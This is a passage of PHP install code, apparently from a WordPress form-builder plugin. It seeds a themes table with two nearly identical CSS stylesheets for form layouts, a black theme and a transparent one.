    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(3, \'Theme 01 black\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 1)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(4, \'Theme 01 transparent (black button)\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
